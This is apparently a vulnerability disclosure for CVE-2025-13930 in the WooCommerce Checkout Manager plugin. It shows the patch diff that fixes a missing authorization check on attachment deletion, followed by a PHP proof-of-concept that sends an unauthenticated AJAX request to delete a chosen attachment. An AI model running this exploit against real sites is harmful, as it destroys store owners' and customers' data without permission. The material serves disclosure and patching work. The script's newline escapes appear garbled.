CVE-2025-13930: Checkout Field Manager (Checkout Manager) for WooCommerce <= 7.8.5 – Missing Authorization to Unauthenticated Arbitrary Attachment Deletion (woocommerce-checkout-manager)

--- a/woocommerce-checkout-manager/build/frontend/js/index.asset.php
+++ b/woocommerce-checkout-manager/build/frontend/js/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('jquery', 'selectWoo'), 'version' => 'a0c35895fe8242798dc8');
+<?php return array('dependencies' => array('jquery', 'selectWoo'), 'version' => '4ef2613ca06cc64d74c5');
--- a/woocommerce-checkout-manager/jetpack_vendor/i18n-map.php
+++ b/woocommerce-checkout-manager/jetpack_vendor/i18n-map.php
@@ -6,7 +6,7 @@
   'packages' => array(
     'jetpack-assets' => array(
       'path' => 'jetpack_vendor/automattic/jetpack-assets',
-      'ver' => '4.3.18',
+      'ver' => '4.3.19',
     ),
     'wp-dashboard-widget-news' => array(
       'path' => 'jetpack_vendor/quadlayers/wp-dashboard-widget-news',
--- a/woocommerce-checkout-manager/lib/class-upload.php
+++ b/woocommerce-checkout-manager/lib/class-upload.php
@@ -126,25 +126,36 @@

 					$session_handler = WC()->session;

-					$is_user_logged = 0 === $current_user->ID;
+					// Security Fix: CVE-2025-13930 - Fixed inverted login check
+					$is_user_logged = 0 !== $current_user->ID;

-					$order_email            = $order->get_billing_email();
-					$session_customer_email = $session_handler->get( 'customer' )['email'];
-
-					$is_session_email_equal_order_email = $order_email === $session_customer_email;
-
-					if ( ! $is_user_logged && ! $is_session_email_equal_order_email ) {
-						wp_send_json_error( esc_html__( 'You must be logged in.', 'woocommerce-checkout-manager' ) );
-					}
-
-					$order_user_id = $order->get_user_id();
-
-					$user_has_capabilities = current_user_can( 'administrator' ) || current_user_can( 'edit_others_shop_orders' ) || current_user_can( 'delete_others_shop_orders' );
-
-					$is_current_user_order_equal_user_id = $current_user->ID === $order_user_id;
-
-					if ( ! $user_has_capabilities && ! $is_current_user_order_equal_user_id ) {
-						wp_send_json_error( esc_html__( 'This is not your order.', 'woocommerce-checkout-manager' ) );
+					// For guest orders, require order key validation
+					if ( ! $is_user_logged ) {
+						// Validate order key for guest orders
+						$order_key = isset( $_REQUEST['order_key'] ) ? wc_clean( wp_unslash( $_REQUEST['order_key'] ) ) : '';
+
+						if ( empty( $order_key ) || ! hash_equals( $order->get_order_key(), $order_key ) ) {
+							wp_send_json_error( esc_html__( 'Invalid order key.', 'woocommerce-checkout-manager' ) );
+						}
+
+						// Verify session email matches order email
+						$session_customer       = $session_handler ? $session_handler->get( 'customer' ) : array();
+						$session_customer_email = isset( $session_customer['email'] ) ? $session_customer['email'] : '';
+						$order_email            = $order->get_billing_email();
+
+						if ( empty( $session_customer_email ) || $order_email !== $session_customer_email ) {
+							wp_send_json_error( esc_html__( 'Email mismatch.', 'woocommerce-checkout-manager' ) );
+						}
+					} else {
+						// For logged-in users, verify ownership or capabilities
+						$order_user_id         = $order->get_user_id();
+						$user_has_capabilities = current_user_can( 'administrator' )
+							|| current_user_can( 'edit_others_shop_orders' )
+							|| current_user_can( 'delete_others_shop_orders' );
+
+						if ( ! $user_has_capabilities && $current_user->ID !== $order_user_id ) {
+							wp_send_json_error( esc_html__( 'This is not your order.', 'woocommerce-checkout-manager' ) );
+						}
 					}

 					wp_delete_attachment( $attachtoremove );
--- a/woocommerce-checkout-manager/templates/order/order-upload-files.php
+++ b/woocommerce-checkout-manager/templates/order/order-upload-files.php
@@ -64,7 +64,7 @@
 			<span><?php esc_html_e( 'Upload Files', 'woocommerce-checkout-manager' ); ?></span>
 			<input data-order_id="<?php echo esc_attr( $order->get_id() ); ?>" data-order_key="<?php echo esc_attr( $order->get_order_key() ); ?>" type="file" name="wooccm_order_attachment_upload" id="wooccm_order_attachment_upload" multiple />
 		</a>
-		<input type="button" id="wooccm_order_attachment_update" class="button button-secondary" value="<?php esc_html_e( 'Save Changes', 'woocommerce-checkout-manager' ); ?>" disabled="disabled">
+		<input type="button" id="wooccm_order_attachment_update" data-order_key="<?php echo esc_attr( $order->get_order_key() ); ?>" class="button button-secondary" value="<?php esc_html_e( 'Save Changes', 'woocommerce-checkout-manager' ); ?>" disabled="disabled">
 		<span class="wooccm_upload_results"></span>
 	</p>
 </div>
--- a/woocommerce-checkout-manager/vendor/composer/installed.php
+++ b/woocommerce-checkout-manager/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'quadlayers/woocommerce-checkout-manager',
-        'pretty_version' => 'v7.8.5',
-        'version' => '7.8.5.0',
-        'reference' => 'bb513c27f1cf5e0addec497f6a40af52293154f9',
+        'pretty_version' => 'v7.8.6',
+        'version' => '7.8.6.0',
+        'reference' => 'b350851e8af4e6e862fde8d61718565f9f349efe',
         'type' => 'project',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -11,9 +11,9 @@
     ),
     'versions' => array(
         'automattic/jetpack-assets' => array(
-            'pretty_version' => 'v4.3.18',
-            'version' => '4.3.18.0',
-            'reference' => '925626ee45a4c9216fb2fe93016a18927da7fafc',
+            'pretty_version' => 'v4.3.19',
+            'version' => '4.3.19.0',
+            'reference' => '8ea6849ac53ca145f9196cb1e9a27c1a4a442330',
             'type' => 'jetpack-library',
             'install_path' => __DIR__ . '/../../jetpack_vendor/automattic/jetpack-assets',
             'aliases' => array(),
@@ -56,9 +56,9 @@
             'dev_requirement' => false,
         ),
         'quadlayers/woocommerce-checkout-manager' => array(
-            'pretty_version' => 'v7.8.5',
-            'version' => '7.8.5.0',
-            'reference' => 'bb513c27f1cf5e0addec497f6a40af52293154f9',
+            'pretty_version' => 'v7.8.6',
+            'version' => '7.8.6.0',
+            'reference' => 'b350851e8af4e6e862fde8d61718565f9f349efe',
             'type' => 'project',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
--- a/woocommerce-checkout-manager/woocommerce-checkout-manager.php
+++ b/woocommerce-checkout-manager/woocommerce-checkout-manager.php
@@ -4,7 +4,7 @@
  * Plugin Name:             WooCommerce Checkout Manager
  * Plugin URI:              https://quadlayers.com/products/woocommerce-checkout-manager/
  * Description:             Manage and customize WooCommerce Checkout fields (Add, Edit, Delete or re-order fields).
- * Version:                 7.8.5
+ * Version:                 7.8.6
  * Author:                  QuadLayers
  * Author URI:              https://quadlayers.com
  * License:                 GPLv3
@@ -25,7 +25,7 @@
  * Definition globals varibles
  */
 define( 'WOOCCM_PLUGIN_NAME', 'WooCommerce Checkout Manager' );
-define( 'WOOCCM_PLUGIN_VERSION', '7.8.5' );
+define( 'WOOCCM_PLUGIN_VERSION', '7.8.6' );
 define( 'WOOCCM_PLUGIN_FILE', __FILE__ );
 define( 'WOOCCM_PLUGIN_DIR', __DIR__ . DIRECTORY_SEPARATOR );
 define( 'WOOCCM_PLUGIN_BASENAME', plugin_basename( __FILE__ ) );

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-13930 - Checkout Field Manager (Checkout Manager) for WooCommerce <= 7.8.5 - Missing Authorization to Unauthenticated Arbitrary Attachment Deletion
<?php
// CONFIGURATION
$target_url = 'https://vulnerable-site.com';
$nonce = 'abc123def456'; // Extract from page source: wooccm_upload nonce
$attachment_id = 789; // ID of the attachment to delete

// Build the POST request
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = array(
    'action' => 'wooccm_order_attachment_delete',
    'wooccm_upload' => $nonce,
    'attachtoremove' => $attachment_id
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // For testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); // For testing only

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Output result
if ($http_code == 200 && strpos($response, 'success') !== false) {
    echo "[SUCCESS] Attachment $attachment_id likely deleted.n";
    echo "Response: $responsen";
} else {
    echo "[FAILED] Request returned HTTP $http_code.n";
    echo "Response: $responsen";
}
?>